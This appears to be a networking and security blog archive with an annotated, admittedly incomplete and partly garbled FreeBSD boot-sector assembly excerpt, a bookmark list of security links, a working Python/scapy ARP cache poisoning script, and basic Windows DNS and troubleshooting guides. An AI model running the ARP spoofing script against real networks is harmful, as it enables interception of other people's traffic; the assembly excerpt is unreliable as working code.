Wednesday, June 13, 2012

#
# Copyright (c) 2001 John Baldwin
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
# 1. Redistributions of source code must retain the above copyright
#    notice, this list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright
#    notice, this list of conditions and the following disclaimer in the
#    documentation and/or other materials provided with the distribution.
# 3. Neither the name of the author nor the names of any co-contributors
#    may be used to endorse or promote products derived from this software
#    without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS ``AS IS'' AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
# OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
# HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
# OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
# SUCH DAMAGE.
#
# $FreeBSD: release/9.0.0/sys/boot/i386/cdboot/cdboot.s 219126 2011-03-01 11:47:51Z brucec $
#
# NOTE(review): this listing is an excerpt of cdboot.s that had been
# collapsed onto a few lines.  It is re-split here one statement per line
# with every directive and instruction kept verbatim; only comments were
# added.  Parts of the original file are missing from the excerpt:
# MEM_PAGE_SIZE, msg_load2big and error are referenced but never defined,
# nothing follows load_done, and lookup breaks off after a few statements
# (two of which are memory-to-memory moves that x86 cannot encode).  Treat
# it as reading material, not as something that assembles as shown.
#
# Syntax: GNU as, AT&T operand order, 16-bit real mode (.code16).
# Role:   first-stage boot sector for a FreeBSD install CD.  It finds the
#         primary volume descriptor of the ISO 9660 file system, looks up
#         the loader binary by name and reads it into memory with BIOS
#         INT 13h extended (EDD) reads.  All sizes and block numbers it
#         uses come from the CD itself, so they are untrusted input in
#         the sense that a crafted disc controls them.
#
# a.out header fields (used by the part of the file that follows load_done,
# which is not in this excerpt)
#
.set AOUT_TEXT,0x04                     # text segment size
.set AOUT_DATA,0x08                     # data segment size
.set AOUT_BSS,0x0c                      # zero'd BSS size
.set AOUT_SYMBOLS,0x10                  # symbol table
.set AOUT_ENTRY,0x14                    # entry point
.set AOUT_HEADER,MEM_PAGE_SIZE          # size of the a.out header
                                        # (MEM_PAGE_SIZE is not defined in
                                        # this excerpt)
#
# Constants for reading from the CD.
#
.set ERROR_TIMEOUT,0x80                 # BIOS timeout on read (unused in
                                        # the read routine shown below)
.set NUM_RETRIES,3                      # Num times to retry (likewise unused
                                        # in this excerpt)
.set SECTOR_SIZE,0x800                  # size of a sector (2 KiB, ISO 9660)
.set SECTOR_SHIFT,11                    # log2(SECTOR_SIZE): bytes -> sectors
.set BUFFER_LEN,0x100                   # number of sectors in buffer
                                        # (0x100 * 0x800 = 512 KiB)
.set MAX_READ,0x10000                   # max we can read at a time (one
                                        # 64 KiB real-mode segment)
.set MAX_READ_SEC,MAX_READ >> SECTOR_SHIFT      # = 32 sectors
.set MEM_READ_BUFFER,0x9000             # buffer to read from CD; with
                                        # BUFFER_LEN it spans 0x9000-0x88fff
.set MEM_VOLDESC,MEM_READ_BUFFER        # volume descriptor
.set MEM_DIR,MEM_VOLDESC+SECTOR_SIZE    # Lookup buffer
.set VOLDESC_LBA,0x10                   # LBA of first volume descriptor
.set VD_PRIMARY,1                       # type byte of the Primary VD
.set VD_END,255                         # type byte of the VD set terminator
.set VD_ROOTDIR,156                     # Offset of Root Dir Record in the PVD
#
# Offsets within an ISO 9660 directory record
#
.set DIR_LEN,0                          # Offset of Dir Record length
.set DIR_EA_LEN,1                       # Offset of EA length (in sectors,
                                        # it is added to the extent LBA)
.set DIR_EXTENT,2                       # Offset of 64-bit LBA (the code
                                        # reads the low 32 bits only)
.set DIR_SIZE,10                        # Offset of 64-bit length (low 32
                                        # bits used)
.set DIR_NAMELEN,32                     # Offset of 8-bit name len
.set DIR_NAME,33                        # Offset of dir name
#
# We expect to be loaded by the BIOS at 0x7c00 (standard boot loader entry
# point).  On entry %dl holds the BIOS drive number we were booted from.
#
.code16
.globl start
.org 0x0, 0x0
#
# Program start.
#
start:          cld                     # string ops increment (scasb below
                                        # depends on this)
                xor %ax,%ax             # zero %ax
                mov %ax,%ss             # setup the stack: %ss = 0, %sp at
                mov $start,%sp          #  our own load address, growing down
                                        #  away from the code
                mov %ax,%ds             # setup the
                mov %ax,%es             #  data segments (all zero)
                mov %dl,drive           # Save BIOS boot device for read
#
# Load Volume Descriptor.  Walk the descriptor set from LBA 0x10 until the
# primary VD (type 1) or the terminator (type 255) is found.
#
                mov $VOLDESC_LBA,%eax   # Set LBA of first VD
load_vd:        push %eax               # Save %eax (read trashes it)
                mov $1,%dh              # One sector
                mov $MEM_VOLDESC,%ebx   # Destination
                call read               # Read it in
                cmpb $VD_PRIMARY,(%bx)  # Primary VD?  (type is byte 0)
                je have_vd              # Yes -- note the pushed %eax is
                                        # left on the stack on this path
                pop %eax                # Prepare to
                inc %eax                #  try next
                cmpb $VD_END,(%bx)      # Last VD?
                jne load_vd             # No, read next
have_vd:                                # Have Primary VD
                                        # NOTE(review): hitting the
                                        # terminator without a primary VD
                                        # also falls through to here; no
                                        # error path exists in this excerpt.
#
# Try to look up the loader binary using the paths in the loader_strings
# array (a run of NUL-terminated names ended by an extra NUL).  lookup is
# expected to clear CF on success and leave %bx pointing at the file's
# directory record; that is how lookup_found uses it (the lookup routine
# itself is truncated in this excerpt).
#
                mov $loader_strings,%si # Point to start of array
lookup_path:    push %si                # Save file name pointer
                call lookup             # Try to find file
                pop %di                 # Restore file name pointer
                jnc lookup_found        # Found this file
                xor %al,%al             # Look for next
                mov $0xffff,%cx         #  path name by
                repnz                   #  scanning for
                scasb                   #  nul char (%di ends just past it)
                mov %di,%si             # Point %si at next path
                mov (%si),%al           # Get first char of next path
                or %al,%al              # Is it double nul?
                jnz lookup_path         # No, try it.
lookup_found:                           # Found a loader file
                                        # NOTE(review): exhausting the list
                                        # also falls through to here with a
                                        # stale %bx; no error path in this
                                        # excerpt.
#
# Load the binary into the buffer.  Due to real mode addressing limitations
# we have to read it in 64k chunks.  The file size comes from the CD, so it
# is bounds-checked against the buffer before any read is issued.
#
                mov DIR_SIZE(%bx),%eax  # Read file length (bytes)
                add $SECTOR_SIZE-1,%eax # Convert length to sectors,
                shr $SECTOR_SHIFT,%eax  #  rounding up
                cmp $BUFFER_LEN,%eax    # More sectors than the buffer holds?
                jbe load_sizeok
                mov $msg_load2big,%si   # Error message (msg_load2big and
                call error              #  error are not in this excerpt)
load_sizeok:    movzbw %al,%cx          # Num sectors to read
                                        # NOTE(review): only %al survives.
                                        # %eax == BUFFER_LEN (0x100) passes
                                        # the jbe above but gives %cx = 0,
                                        # so a file of exactly 512 KiB loads
                                        # nothing; sizes that wrap in the
                                        # add above also end up tiny here.
                mov DIR_EXTENT(%bx),%eax        # Load extent (start LBA)
                xor %edx,%edx
                mov DIR_EA_LEN(%bx),%dl
                add %edx,%eax           # Skip extended attribute record
                mov $MEM_READ_BUFFER,%ebx       # Read into the buffer
load_loop:      mov %cl,%dh             # %dh = sectors for this read
                cmp $MAX_READ_SEC,%cl   # Truncate to max read size
                jbe load_notrunc
                mov $MAX_READ_SEC,%dh
load_notrunc:   sub %dh,%cl             # Update count (%cx = sectors left)
                push %eax               # Save LBA (read trashes %eax)
                call read               # Read it in
                pop %eax                # Restore
                add $MAX_READ_SEC,%eax  # Update LBA
                add $MAX_READ,%ebx      # Update dest addr by one segment
                jcxz load_done          # Done?
                jmp load_loop           # Keep going
load_done:
                                        # NOTE(review): in the full file the
                                        # loaded image is checked and
                                        # entered here; this excerpt drops
                                        # that and runs straight into lookup.
#
# Lookup the file in the path at [SI] from the root directory.
#
# NOTE(review): this routine is truncated and partly garbled in the excerpt.
# The two "mov mem,mem" forms cannot be encoded on x86 and GAS rejects
# them, "mov $rec_size,%eax" loads the *address* of rec_size although the
# comment says LBA, and the routine falls straight into read with no ret.
# Do not rely on this stretch; consult the full cdboot.s.
#
lookup:         mov $VD_ROOTDIR+MEM_VOLDESC,%bx # Root directory record
                mov DIR_EXTENT(%bx),rec_lba
                mov DIR_SIZE(%bx),rec_size
                mov $rec_size,%eax      # Set LBA of root dir (sic)
                push %eax               # Save %eax
                mov $1,%dh
                mov $MEM_VOLDESC,%ebx   # Destination
#
# Load DH sectors starting at LBA EAX into [EBX].
#
# In:      %eax = LBA (32-bit), %dh = sector count, %ebx = linear buffer
#          address (its low 4 bits are dropped: only a segment is stored
#          and the offset word of edd_addr stays 0, fine for the 16-aligned
#          addresses this file passes)
# Trashes: EAX.  %si, %cx, %dx are saved and restored around the BIOS call.
#
# NOTE(review): as shown, CF from INT 13h (set on failure) is never tested,
# so a failed read is invisible and the caller parses whatever was in the
# buffer.  ERROR_TIMEOUT / NUM_RETRIES are defined above but unused here;
# the full file presumably carries a retry/error path the excerpt dropped.
#
read:           push %si                # Save
                push %cx                # Save since some BIOSs trash it
                mov %eax,edd_lba        # LBA to read from (low dword; the
                                        # high dword of the .quad stays 0)
                mov %ebx,%eax           # Convert address
                shr $4,%eax             #  to segment
                mov %ax,edd_addr+0x2    #  and store (segment word)
                push %dx                # Save
                mov $edd_packet,%si     # Address Packet (%ds:%si)
                mov %dh,edd_len         # Set length
                mov drive,%dl           # BIOS Device
                mov $0x42,%ah           # BIOS: Extended Read
                int $0x13               # Call BIOS
                pop %dx                 # Restore
                pop %cx                 # Restore
                pop %si
                ret                     # Return
#
# EDD Packet (disk address packet for INT 13h AH=42h), 16 bytes
#
edd_packet:     .byte 0x10              # Length of the packet
                .byte 0                 # Reserved
edd_len:        .byte 0x0               # Num sectors to read
                .byte 0                 # Reserved
edd_addr:       .word 0x0,0x0           # Transfer buffer: offset word then
                                        # segment word (read writes +2)
edd_lba:        .quad 0x0               # LBA
drive:          .byte 0                 # BIOS drive number saved at start
#
# State for searching dir
#
rec_lba:        .long 0x0               # LBA (adjusted for EA)
rec_size:       .long 0x0               # File size
#
# Names tried in order by lookup_path; the extra NUL ends the list.
#
loader_strings: .asciz "LOADER"
                .asciz "loader"
                .byte 0

Monday, July 12, 2010

Tech Links




Here is my bookmark list. All of these links have something to do with networking, security, Linux, web development or technology in general. I apologize that it isn't very organized, but the information contained within them is very useful for learning about network administration.


Hak5 – Technolust since 2005
IANA — Internet Assigned Numbers Authority
Internet Engineering Task Force
US-CERT: United States Computer Emergency Readiness Team
SecurityFocus
DEF CON® Hacking Conference - The Hacker Community's Foremost Social Network.
Technology News, Analysis, Comments and Product Reviews for IT Professionals | ZDNet
Default Password List
Android Developers
W3Schools Online Web Tutorials
Color Scheme Designer 3
Typetester – Compare fonts for the screen
Tactile 3D Interface - Software to browse, explore, and organize your file-system in 3D.
Oculis Labs, PrivateEye
.:: Phrack Magazine ::.
Security - Keylogging
Testing and reviews of keyloggers, monitoring products and spy software (spyware) 2009
Tricks of the Trade: Cracking passwords with Wikipedia, Wiktionary, Wikibooks etc
What’s My Pass? » The Top 500 Worst Passwords of All Time
List of Free Proxy Servers - Page 1 of 9
bh-us-03-willis.pdf (application/pdf Object)
Welcome to The TCP/IP Guide!
Welcome to Scapy's documentation! — Scapy v2.1.1-dev documentation
Internet Protocol Suite - Wikipedia, the free encyclopedia
SCAPY packet-crafting reference
Usage — Scapy v2.1.1-dev documentation
TCP Exploits by Prabhaker Mateti
TCP, Transmission Control Protocol
ARP spoofing - Wikipedia, the free encyclopedia
HEXADECIMAL to BINARY conversion, HEX to Decimal converter, Hexdecimal convertor
Cracking_Passwords_Guide.pdf (application/pdf Object)
PF: The OpenBSD Packet Filter
YouTube - SSL Strip
Moxie Marlinspike >> Software
PORTKNOCKING - A system for stealthy authentication across closed ports. : ABOUT : summary
HOWTO: Internet sharing with Ubuntu (NAT Gateway) - Ubuntu Forums
Paper: Kr3w's Cross-Site Scripting Tutorial | Articles | XSSed.com
SANS: Top Cyber Security Risks - Executive Summary
IT Security Magazine - Hakin9 www.hakin9.org
Black Hat ® Technical Security Conference // Home
2.1. Address Resolution Protocol (ARP)
Getting MAC address from a network interface
List of TCP and UDP port numbers - Wikipedia, the free encyclopedia
Wireshark · OUI Lookup Tool
Ethernet Type Codes
Multiple network interfaces and ARP flux - OpenVZ Wiki
arp(7): ARP kernel module - Linux man page
Section 27.6.  Neighbor Deletion
OReilly.Understanding.Linux.Network.Internals.Dec.2005
http://www.etpenguin.com/pub/Reference/DOC_arp.txt
http://tools.made-it.com/haring/desc.html
IRC - Linux Kernel Newbies
PLUG - Home
arp_accept | LinuxInsight
Arpwatch
git.kernel.org - linux/kernel/git/stable/linux-2.6.34.y.git/blob - Documentation/networking/ip-sysctl.txt
.::ArpON::.
CAM Table Overflow - Hakipedia
Defcon 15 - T364 LAN Protocol Attacks Part 1 - Arp Reloaded
Free online network utilities - traceroute, nslookup, automatic whois lookup, ping, finger
Free Webmaster Tools & Search Engine Optimization Tools
Geotool
Domain Tools: Whois Lookup and Domain Suggestions
IHS | Home of Johnny Long and Hackers for Charity, Inc
Snort :: Docs
Offensive Computing | Community Malicious code research and analysis
Wirelessdefence.org
www.dd-wrt.com | Unleash Your Router
Programming with pcap
http://www.secdev.org/projects/scapy/files/scapydoc.pdf
DigiNinja
YouTube - Hacking wireless networks with Man in the Middle attacks

ARP Cache Poisoning

Here is a simple script I wrote in Python. It performs an ARP cache poisoning attack by sending a forged ARP request whose sender fields pair the IP address being impersonated with this machine's MAC address, so the victim updates its ARP cache to point that IP at us.
The syntax is "arpnuke [interface] [victim IP] [IP to masquerade as]"
For it to work it must be run as root and scapy must be installed.
Static ARP entries (see the arp man page) stop this on the host where you configure them, but they have to be maintained by hand on every host and for every peer, so they do not scale; on larger networks, ARP inspection on the switch or a monitor such as arpwatch or ArpON (both linked above) is the more practical defense. Note that "ifconfig -arp" disables ARP on the interface entirely, so it only works when every peer has been given a static entry.


#!/usr/bin/python

import os
import subprocess
import sys

from scapy.all import Ether,ARP,conf,sendp

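# Command line: arpnuke [interface] [victim IP] [IP to masquerade as]
if len(sys.argv) != 4:
    sys.stderr.write('usage: %s [interface] [victim IP] [IP to masquerade as]\n'
                     % sys.argv[0])
    sys.exit(1)
interface = sys.argv[1]
victim = sys.argv[2]
identity = sys.argv[3]
conf.iface = interface
print(conf.iface)


def _arp_cache_has(ip):
    """Return True if /proc/net/arp holds a resolved entry for exactly `ip`.

    Each data line of /proc/net/arp is
        IP address  HW type  Flags  HW address  Mask  Device
    The IP is compared as a whole field, so 10.0.0.1 does not match
    10.0.0.10 (the old ``grep`` matched substrings and treated '.' as a
    regex wildcard).  An entry whose Flags column is 0x0 has not been
    resolved yet and is treated as absent.  An unreadable table also
    counts as absent, so the caller falls back to arping.
    """
    try:
        with open('/proc/net/arp') as table:
            for line in table:
                fields = line.split()
                if len(fields) >= 4 and fields[0] == ip and fields[2] != '0x0':
                    return True
    except IOError:
        pass
    return False


# Make sure the kernel knows the victim's MAC before it is looked up below:
# send one ARP request and stop at the first reply (arping -f).  The
# arguments are passed as a list, never interpolated into a shell string,
# so an odd-looking argument cannot turn into a second root command.
if not _arp_cache_has(victim):
    subprocess.call(['arping', '-f', '-I', interface, victim])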

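def local_mac(iface, sysfs_root='/sys/class/net'):
    """Return the hardware (MAC) address of the local interface `iface`.

    Reads <sysfs_root>/<iface>/address instead of scraping ``ifconfig``
    output.  The old ``cut -d" " -f11`` depended on the exact column
    spacing of one net-tools version, and the result went through a
    predictable file under /tmp written as root, which a local user could
    pre-create (for example as a symlink) before the script ran.

    Returns the address exactly as the kernel prints it (lower-case,
    colon-separated, no trailing newline), or '' when the interface does
    not exist or the file cannot be read -- the old code also returned ''
    in that case.  `sysfs_root` only exists so the lookup can be pointed
    at a test tree.
    """
    path = os.path.join(sysfs_root, iface, 'address')
    try:
        with open(path) as f:
            return f.readline().strip()
    except IOError:
        return ''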

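def neigh_mac(ip, table=None):
    """Return the MAC address the kernel ARP cache holds for `ip`, or ''.

    `table` is the text of /proc/net/arp; when None (the normal case) the
    file is read directly.  Each data line is
        IP address  HW type  Flags  HW address  Mask  Device
    The IP is compared as a whole field, so 10.0.0.1 no longer matches
    10.0.0.10 (the old ``arp -na | grep`` matched substrings and treated
    '.' as a regex wildcard, so it could return a neighbour's MAC).  An
    entry whose Flags column is 0x0 is still unresolved and is reported as
    absent rather than as 00:00:00:00:00:00.  No shell command and no
    temp file under /tmp are involved any more.
    """
    if table is None:
        try:
            with open('/proc/net/arp') as f:
                table = f.read()
        except IOError:
            return ''
    for line in table.splitlines():
        fields = line.split()
        if len(fields) < 4 or fields[0] != ip:
            continue
        if fields[2] == '0x0':
            continue
        return fields[3]
    return ''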

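destmac = neigh_mac(victim)
srcmac = local_mac(interface)
# Both lookups return '' on failure; scapy would only fail later with an
# obscure error, so stop here with a clear message instead.
if not destmac:
    sys.stderr.write('arpnuke: no ARP entry for %s on %s\n' % (victim, interface))
    sys.exit(1)
if not srcmac:
    sys.stderr.write('arpnuke: cannot read the MAC address of %s\n' % interface)
    sys.exit(1)

# Frame addressed straight to the victim; 0x806 is the ARP EtherType.
ether = Ether(dst=destmac, src=srcmac, type=0x806)
# op=1 is an ARP *request* whose sender pair is (our MAC, the IP we are
# impersonating).  Stacks generally record the sender pair of requests
# they receive, so the victim's cache ends up mapping `identity` to our MAC.
arp = ARP(hwsrc=srcmac, psrc=identity, hwdst=destmac, pdst=victim, op=1)

sendp(ether/arp)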

Monday, February 15, 2010

HOWTO configure client-side DNS (windows)

STEP 1
Right click on the networking icon in the bottom right and select "Open Network Connections" or go "Control-panel > Network and Internet Connections > Network Connections"



STEP 2
Right click on the desired network connection and click "properties"


STEP 3
Select "Internet Protocol (TCP/IP)" or "Internet Protocol version 4 (TCP/IP)" and click "properties"


STEP 4
Change "Obtain DNS server address automatically" to "Use the following DNS server addresses" and then enter the IP address(es) of your DNS server(s). The preferred server is queried first; the alternate server is used only when the preferred one does not respond. Only the preferred address is required.


STEP 5
Reconnect to the network and run "nslookup some.domain.name". Your new server should be shown on the Server and Address lines, as in the picture below. If the settings still haven't taken effect, try rebooting the system.

Friday, February 5, 2010

Basic Home Network Troubleshooting Tutorial.

This is just a simple guide to help fix most network problems. It doesn't cover installing NIC drivers, configuring DNS, or the very basics such as how to connect to a network. This is just here to give you some steps to take before you decide to call up your ISP and ask for further assistance.

STEP 1

Restart your browser and try visiting other websites. Are you able to visit other sites, or are you still receiving the same error?
If other sites work then the website you were trying to visit is down. Otherwise move on to step 2.


STEP 2

Is your computer connected to your router? There are two ways this can be done: wirelessly or with an ethernet cable. Ethernet cables are usually blue and the ends look like phone jacks. Make sure the cable or wireless adapter is plugged in all the way and isn't loose.
Here are some examples of wireless adapters:



STEP 3


Unplug both your modem and your router from their power source. The modem is the device that either plugs into the wall via a phone line or a coax cable (the same kind of cable that your TV plugs into the wall with). The only connection between the router and the wall is the power cable. Now would be a good time to make sure the router is connected to the modem, there should be a cable going from the modem into a slot on the back of the router labeled "WAN". Wait 1 minute and then plug the power back into the modem. Now wait 2 more minutes and then plug the power back into the router. Wait another minute and then reboot your computer.


STEP 4

Test connectivity between your computer and your router. To do this open the command prompt by clicking "Start > Run" and then enter "cmd" or "cmd.exe" and press enter. Type "ipconfig" in to the black window that pops up.


Now make note of the "Default Gateway"; in this photo it would be "10.0.0.1". Now try to "ping" the router by entering the command "ping <default gateway>". So in my case I would type in "ping 10.0.0.1" and would get something like the following (the screenshot below uses "google.com" where your default gateway should go):


The second section indicated by the red box that says "Packets: Sent" shows you whether your ping requests are able to reach the router. If you are sending 4 and receiving 0 then there is a connection problem between your computer and your router.

Here are some other good links:
http://www.microsoft.com/windowsxp/using/networking/setup/wireless.mspx
http://support.microsoft.com/kb/928429
http://searchnetworking.techtarget.com/news/article/0,289142,sid7_gci945257,00.html